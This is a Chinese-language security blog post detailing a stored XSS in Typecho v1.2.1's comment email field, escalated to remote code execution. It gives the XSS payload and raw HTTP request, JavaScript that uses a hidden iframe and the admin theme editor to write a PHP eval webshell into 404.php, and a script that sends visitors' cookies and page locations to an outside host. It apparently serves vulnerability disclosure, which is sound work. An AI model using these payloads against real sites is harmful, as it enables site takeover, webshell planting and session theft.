iami233
iami233
文章175
标签37
分类4

文章分类

文章归档

Typecho v1.2.1 RCE

Typecho v1.2.1 RCE

和前段时间的 PHPStudy RCE 一样是 1click,通过 存储型XSS 实现 RCE

XSS

今天关注到 Typecho Github仓库新增了一条 Issue :There’s still an XSS vulnerability in v1.2.1-rc

漏洞产生的原因是因为对Typecho 1.2.0 XSS漏洞修复不全导致,Issue 中提到的 Payload 如下(漏洞点在Email,而1.2.0漏洞点在网址)

1
"></a><script>alert('hacked')</script>"@example.com

直接抓包发送请求

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php/archives/1/comment HTTP/1.1
Host: ty.la
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ty.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ty.la/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert('hacked')</script>"@example.com&url=&text=%E6%B5%8B%E8%AF%95&_=b04942bb37418474b1680405acf18a79

image-20230415200852968

RCE

1
"></a><script/src=http://url/1.js></script>"@example.com

js 文件内容如下,脚本来源 https://github.com/typecho/typecho/issues/1545 ,主要是通过定义一个隐藏的 iframe 来操作 Typecho 内置的 编辑当前外观 功能来实现写入操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
function step1() {
var data2 = '<iframe id="testxss" src="/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>';
var oldata = document.body.innerHTML;
document.body.innerHTML = oldata + data2;
}

var times=0;
var g_shell=0;
function poc() {
if (times <= 10) {
var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content");
var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button");
olddatas = htmldata.innerText;
htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas;
btn[1].click();
times += 1;
if (g_shell == 1) {
var xhr1 = new XMLHttpRequest();
xhr1.open("get", "/usr/themes/default/404.php?shell=1");
xhr1.send();
} else {
return 0;
}
}
}

step1();

访问发现一句话木马已经被写入 404.php 文件

image-20230415203743033

获取 Cookie 脚本

1
2
var website="http://xss.xxx.com";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
本文作者:iami233
本文链接:https://5ime.cn/typecho-xss2rce.html
版权声明:本文采用 CC BY-NC-SA 3.0 CN 协议进行许可